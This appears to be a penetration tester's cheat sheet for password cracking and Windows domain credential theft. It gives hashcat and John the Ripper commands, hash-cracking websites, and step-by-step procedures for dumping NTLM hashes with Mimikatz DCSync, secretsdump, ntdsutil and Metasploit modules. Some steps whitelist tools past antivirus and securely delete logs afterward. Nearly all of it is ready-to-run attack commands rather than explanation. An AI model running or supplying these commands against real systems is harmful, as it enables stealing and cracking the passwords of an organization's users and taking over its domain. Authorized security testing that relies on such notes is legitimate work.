Password cracking

Hash identifier

hash-identifier 

Online cracking (CTF only)

https://hashkiller.co.uk/
https://crackstation.net/
https://www.onlinehashcrack.com/
http://cracker.offensive-security.com/
https://md5decrypt.net/en/
https://www.cmd5.org/
https://crack.sh/
https://gpuhash.me/
https://hash.help/
https://passwordrecovery.io/

CEWL

cewl <domain> -m 6 -w <out>

JtR

john --format=md5crypt unshadowed
auxiliary/analyze/jtr_crack_fast

kerberoasting

john <krb.txt> --wordlist=</usr/share/wordlists/rockyou.txt>

Hashcat and Hashes

Hashcat SHA512 $6$ shadow file

hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

Hashcat MD5 $1$ shadow file

hashcat -m 500 -a 0 hash.txt rockyou.txt --username

Hashcat MD5 Apache webdav file

hashcat -m 1600 -a 0 hash.txt rockyou.txt

Hashcat SHA1

hashcat -m 100 -a 0 hash.txt rockyou.txt

Hashcat Wordpress

hashcat -m 400 -a 0 hash.txt rockyou.txt

Hashcat Kerberoasting

hashcat -m 13100 -a 0 hash.txt rockyou.txt

Crack SSH private key

Proc-Type: 4,ENCRYPTED
/opt/ssh2john.py id_rsa > id_john
john id_john --wordlist=</usr/share/wordlists/rockyou.txt>

Dump NTLM passwords

use windows/gather/credentials/domain_hashdump

Alternatives methods

use auxiliary/admin/smb/psexec_ntdsgrab
Hashdump / smarthashdump (unsafe for big AD)

Mimikatz Module:
lsadump::lsa /inject (totally unsafe)

Impacket

impacket-secretsdump <fqdn_domain>/<da_account>:'<password>'@<DC_ip> -just-dc

Ntdutil (Need a copy of SAM and SYSTEM too)

ntdsutil 
activate instance ntdsqifm
create full C:\ntdsutil
quit
quit

Dump

./adXtract.sh /root/ntds.dit /root/SYSTEM <projectname>

NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

Parsing

From impacket-secretdump

grep '.*:.*:.*:.*:::' <impacket.hashes> | cut -d ':' -f1,4 | grep -v '\$' > <domain.hashes>

From MSF

db_export -f pwdump <mission.pwdump>
grep '.*:.*:.*:.*:::' mission.pwdump > mission.hashes

From ntds.dit + SYSTEM

secretsdump.py -ntds <ntds.dit> -system <SYSTEM> LOCAL | grep '.*:.*:.*:.*:::' | cut -d ":" -f 1,4 > /tmp/ntds.hash
git clone https://github.com/HarmJ0y/ImpDump /opt/Impdump
cd /opt/Impdump
chmod +x setup.sh
./setup.sh

/opt/Impdump/extract.sh <NTDS.dit> > /tmp/ntds.raw
/opt/Impdump/impdump.py <SYSTEM> /tmp/ntds.raw | cut -d ":" -f 1,4 > /tmp/ntds.hash

DCSync extraction method

Prerequisites
  • Domain Account with Replicating Directory Changes and Replicating Directory Changes All permissions. By default, this is limited to the Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups.
  • Being connected with this account on any Domain tied system (server or workstation), it is not necessary to be on the domain controller itself.
  • Access powershell on the system
  • Download the latest mimikatz release
  • Extract the archive and whitelist the binaries in the Antivirus/Applocker if necessary.
  • Download Secure Delete from sysinternals
Extraction

Check your system architecture and choose mimikatz version accordingly (32 or 64 bits)
Check by typing the following command and check “System Type” line

C:\>systeminfo | findstr "System"
System Boot Time:          01-01-1970, 00:00:00
System Manufacturer:       Some manufacturer
System Model:              Some model
System Type:               x64-based PC
System Directory:          C:\WINDOWS\system32
System Locale:             fr-be;French (Belgium)

In mimikatz prompt type the following commands (one by one)

log C:\mimikatz.log
lsadump::dcsync /all /csv
exit

Open the mimikatz logfile and remove all lines not correspoding to dcsync output
All remaining data should have this format userID username ntlmhash save and close the logfile

Parsing

Parse hashes with hashcat syntax a store it in C:\ntlm.hash

Get-Content C:\mimikatz.log | ForEach-Object { $_ -replace "\s+",":" } | ForEach-Object { $_.split(":")[1:2] -join ":" }| Out-File C:\ntlm.hash
Cleanup
  • Remove mimikatz (Downloaded archive, x32 and x64 folder, and all other files)
  • Remove the eventual Antivirus/Applocker whitelist
  • Securely remove C:\mimikatz.log with sdelete
  • Securely remove C:\ntlm.hash with sdelete

Password cracking NTLM (domain)

hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\best64.rule 
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\d3*
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\realuniq.lst -r rules\best64.rule
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\small\* -r rules\*
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out ?a?a?a?a?a?a -i
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out -1 ?l?d -2 ?d?s ?u?l?l?l?l?1?1?2?2
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out ?d?d?d?d?d?d?d?d?d?d?d?d -i
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\efensive.rule

Common masks

hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?d?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?d?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?l?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?d?s

Custom dictionnary

1) Reuse cracked password
2) Establish patterns to perfom mask attacks